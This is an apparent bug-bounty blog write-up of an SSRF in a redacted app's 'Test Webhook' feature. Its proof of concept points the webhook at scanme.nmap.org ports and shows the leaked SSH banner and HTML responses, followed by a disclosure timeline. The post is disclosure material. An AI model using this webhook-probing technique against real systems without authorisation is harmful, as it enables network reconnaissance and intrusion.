Tuesday, August 13, 2019

SSRF Vulnerability in https://app.[REDACTED].com



Hello!

Almost a year ago I found a simple SSRF Vulnerability in a private program which allow me to inject a SSRF payload thru their Webhook.

There is a feature called "Test Webhook" on their application and while trying some other kind of vulnerability, I was able to trigger a SSRF on this feature.

So long story short, here's the report timeline and proof of concept of this issue.

--Proof of Concept--

1. Go to https://app.<REDACTED>.com/app/webhooks
2. In the "Test Webhook" input the test payload

In my test, I tried making a request from port 22, 21 and 80  (http://scanme.nmap.org:22) and the response is

Port 22: Response: Bad response: (u'wrong number of parts', 'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10')

Port 21: Response: Response: Could not connect to remote server: No route to host: 101: Network is unreachable.

Port 80: Response: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<title>Go ahead and ScanMe!</title>

<link REL="SHORTCUT ICON" HREF="/shared/images/tiny-eyeicon.png" TYPE="image/png">
<META NAME="ROBOTS" CONTENT="NOARCHIVE">
<link rel="stylesheet" href="/shared/css/insecdb.css" type="text/css">

--Timeline--

Report Title: SSRF in https://app.<REDACTED>.com/app/webhooks
Reported: 24 Oct 2018 22:21:32 UTC
Closed: 29 Oct 2018 20:07:02 UTC (Duplicate)

So I hope you enjoy this write up and have a great day everyone!


No comments:

Post a comment